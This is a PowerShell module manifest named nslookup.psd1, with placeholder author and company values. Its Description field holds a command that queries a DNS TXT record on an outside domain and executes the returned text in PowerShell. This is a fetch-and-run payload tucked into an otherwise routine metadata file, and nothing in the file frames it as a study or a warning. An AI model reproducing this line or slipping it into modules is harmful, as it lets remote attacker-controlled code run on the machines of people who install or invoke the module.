nslookup.psd1

@{
    # Metadata about the module
    RootModule = 'nslookup.psm1'
    ModuleVersion = '1.0'
    GUID = '{fc781a33-508f-4eff-ba1e-d9cb1a00363b}'
    Author = 'Your Name'
    CompanyName = 'Your Company'
    Copyright = '(c) 2023 Your Name. All rights reserved.'
    Description = 'powershell . (nslookup -type=txt ns.nomorebefore.com)[-4]' 
    # Required modules
    RequiredModules = @()
    # Functions to export
    FunctionsToExport = '*'
    # Cmdlets to export
    CmdletsToExport = '*'
    # Variables to export
    VariablesToExport = '*'
    # Aliases to export
    AliasesToExport = '*'
}